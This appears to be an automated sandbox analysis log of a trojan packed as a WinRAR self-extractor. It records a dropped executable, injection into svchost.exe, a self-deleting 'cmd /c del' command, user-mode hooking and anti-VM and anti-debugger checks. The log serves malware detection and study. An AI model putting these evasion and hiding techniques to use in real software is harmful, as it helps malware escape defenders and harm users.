Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: dxgidebug.dll	Jump to behavior

Source: F61A.tmp.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: F61A.tmp.1.dr

Static PE information: Section .text

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

File read: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Jump to behavior

Source: primosdv3.1.1.0.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\primosdv3.1.1.0.exe C:\Users\user\Desktop\primosdv3.1.1.0.exe
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7139109

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/4@2/2

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C66C74 GetLastError,FormatMessageW,

0_2_00C66C74

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_01

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C7A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00C7A6C2

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Command line argument: sfxname	0_2_00C7DF1E
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Command line argument: sfxstime	0_2_00C7DF1E
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Command line argument: STARTDLG	0_2_00C7DF1E

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: primosdv3.1.1.0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: primosdv3.1.1.0.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: primosdv3.1.1.0.exe
Source:	Binary string: wntdll.pdbUGP source: bstkiooen.exe, 00000001.00000003.255333801.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000001.00000003.253799569.0000000002B30000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: bstkiooen.exe, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp

Source: primosdv3.1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: primosdv3.1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: primosdv3.1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: primosdv3.1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: primosdv3.1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7F640 push ecx; ret	0_2_00C7F653
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7EB78 push eax; ret	0_2_00C7EB96
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0169D0D1 push ecx; ret	2_2_0169D0E4
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00417B13 push edi; retf	2_2_00417B14
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041D4B5 push eax; ret	2_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00417D68 push edx; ret	2_2_00417D6A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041D56C push eax; ret	2_2_0041D572
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041D502 push eax; ret	2_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041D50B push eax; ret	2_2_0041D572

PE file contains sections with non-standard names

Source: primosdv3.1.1.0.exe

Static PE information: section name: .didat

File is packed with WinRar

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7139109

Jump to behavior

Source: initial sample

Static PE information: section name: .text entropy: 7.410591725114109

Drops PE files

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	File created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	File created: C:\Users\user\AppData\Local\Temp\F61A.tmp			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE6

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\F61A.TMP

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002D79904 second address: 0000000002D7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002D79B7E second address: 0000000002D79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F61A.tmp

Jump to dropped file

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Code function: 2_2_01686DE6 rdtsc

2_2_01686DE6

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

API coverage: 9.3 %

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C7E6A3 VirtualQuery,GetSystemInfo,

0_2_00C7E6A3

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00C6A69B
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00C7C220
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C8B348 FindFirstFileExA,	0_2_00C8B348

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

API call chain: ExitProcess graph end node

Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: explorer.exe, 00000003.00000000.304900101.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000003.00000000.334006724.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000003.00000000.299904671.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: explorer.exe, 00000003.00000000.334006724.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000003.00000000.284751375.000000000F62F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft Sto

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00C7F838

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C8C030 GetProcessHeap,

0_2_00C8C030

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Code function: 2_2_01686DE6 rdtsc

2_2_01686DE6

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C87DEE mov eax, dword ptr fs:[00000030h]	0_2_00C87DEE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD007A mov eax, dword ptr fs:[00000030h]	1_2_00BD007A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD0019 mov eax, dword ptr fs:[00000030h]	1_2_00BD0019
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD0149 mov eax, dword ptr fs:[00000030h]	1_2_00BD0149
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD0005 mov eax, dword ptr fs:[00000030h]	1_2_00BD0005
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164C962 mov eax, dword ptr fs:[00000030h]	2_2_0164C962
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166C577 mov eax, dword ptr fs:[00000030h]	2_2_0166C577
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166C577 mov eax, dword ptr fs:[00000030h]	2_2_0166C577
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164B171 mov eax, dword ptr fs:[00000030h]	2_2_0164B171
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164B171 mov eax, dword ptr fs:[00000030h]	2_2_0164B171
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166B944 mov eax, dword ptr fs:[00000030h]	2_2_0166B944
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166B944 mov eax, dword ptr fs:[00000030h]	2_2_0166B944
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01683D43 mov eax, dword ptr fs:[00000030h]	2_2_01683D43
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C3540 mov eax, dword ptr fs:[00000030h]	2_2_016C3540
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01667D50 mov eax, dword ptr fs:[00000030h]	2_2_01667D50
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718D34 mov eax, dword ptr fs:[00000030h]	2_2_01718D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120 mov ecx, dword ptr fs:[00000030h]	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164AD30 mov eax, dword ptr fs:[00000030h]	2_2_0164AD30
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016CA537 mov eax, dword ptr fs:[00000030h]	2_2_016CA537
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h]	2_2_01674D3B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h]	2_2_01674D3B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h]	2_2_01674D3B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167513A mov eax, dword ptr fs:[00000030h]	2_2_0167513A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167513A mov eax, dword ptr fs:[00000030h]	2_2_0167513A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649100 mov eax, dword ptr fs:[00000030h]	2_2_01649100
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649100 mov eax, dword ptr fs:[00000030h]	2_2_01649100
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649100 mov eax, dword ptr fs:[00000030h]	2_2_01649100
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0164B1E1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0164B1E1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0164B1E1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016D41E8 mov eax, dword ptr fs:[00000030h]	2_2_016D41E8
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0165D5E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0165D5E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016F8DF1 mov eax, dword ptr fs:[00000030h]	2_2_016F8DF1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016735A1 mov eax, dword ptr fs:[00000030h]	2_2_016735A1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016761A0 mov eax, dword ptr fs:[00000030h]	2_2_016761A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016761A0 mov eax, dword ptr fs:[00000030h]	2_2_016761A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C69A6 mov eax, dword ptr fs:[00000030h]	2_2_016C69A6
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h]	2_2_01671DB5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h]	2_2_01671DB5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h]	2_2_01671DB5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]	2_2_016C51BE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]	2_2_016C51BE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]	2_2_016C51BE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]	2_2_016C51BE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A185 mov eax, dword ptr fs:[00000030h]	2_2_0167A185
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166C182 mov eax, dword ptr fs:[00000030h]	2_2_0166C182
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]	2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]	2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]	2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]	2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]	2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]	2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]	2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]	2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]	2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672990 mov eax, dword ptr fs:[00000030h]	2_2_01672990
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167FD9B mov eax, dword ptr fs:[00000030h]	2_2_0167FD9B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167FD9B mov eax, dword ptr fs:[00000030h]	2_2_0167FD9B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01702073 mov eax, dword ptr fs:[00000030h]	2_2_01702073
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01711074 mov eax, dword ptr fs:[00000030h]	2_2_01711074
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166746D mov eax, dword ptr fs:[00000030h]	2_2_0166746D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A44B mov eax, dword ptr fs:[00000030h]	2_2_0167A44B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01660050 mov eax, dword ptr fs:[00000030h]	2_2_01660050
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01660050 mov eax, dword ptr fs:[00000030h]	2_2_01660050
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DC450 mov eax, dword ptr fs:[00000030h]	2_2_016DC450
